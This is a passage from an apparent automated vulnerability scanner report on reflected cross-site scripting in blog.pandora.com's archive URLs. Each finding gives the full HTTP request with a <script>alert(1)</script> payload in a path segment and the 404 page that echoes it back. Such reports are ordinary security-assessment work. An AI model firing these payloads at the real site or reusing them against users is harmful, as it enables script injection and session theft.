Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ was not found on this server.</p>
...[SNIP]...

1.62. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7029<script>alert(1)</script>c9c50ef33cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ was not found on this server.</p>
...[SNIP]...

1.63. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dc61<script>alert(1)</script>2a8a18ec9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ was not found on this server.</p>
...[SNIP]...

1.64. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee470<script>alert(1)</script>1e1c157cf31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ was not found on this server.</p>
...[SNIP]...

1.65. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eab0<script>alert(1)</script>503e2b138de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ was not found on this server.</p>
...[SNIP]...

1.66. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f7d2c<script>alert(1)</script>8f8c0843fd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ was not found on this server.</p>
...[SNIP]...

1.67. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fc20<script>alert(1)</script>d72027cb382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ was not found on this server.</p>
...[SNIP]...

1.68. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e051<script>alert(1)</script>cfbbd073882 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ was not found on this server.</p>
...[SNIP]...

1.69. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b74cd<script>alert(1)</script>9b829fedb43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ was not found on this server.</p>
...[SNIP]...

1.70. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4491<script>alert(1)</script>0e7243d947a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ was not found on this server.</p>
...[SNIP]...

1.71. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f27b<script>alert(1)</script>ff6cdc57baa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ was not found on this server.</p>
...[SNIP]...

1.72. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b166<script>alert(1)</script>c595edeaf7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ was not found on this server.</p>
...[SNIP]...

1.73. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d7d6<script>alert(1)</script>9c1bb7f29d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ was not found on this server.</p>
...[SNIP]...

1.74. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89734<script>alert(1)</script>10ad202e6f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ was not found on this server.</p>
...[SNIP]...

1.75. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 226ab<script>alert(1)</script>db94c5f4ab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ was not found on this server.</p>
...[SNIP]...

1.76. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7b27<script>alert(1)</script>e88437a6ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ was not found on this server.</p>
...[SNIP]...

1.77. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fcf4c<script>alert(1)</script>158d11b266d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ was not found on this server.</p>
...[SNIP]...

1.78. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0649<script>alert(1)</script>9f0447f5c89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
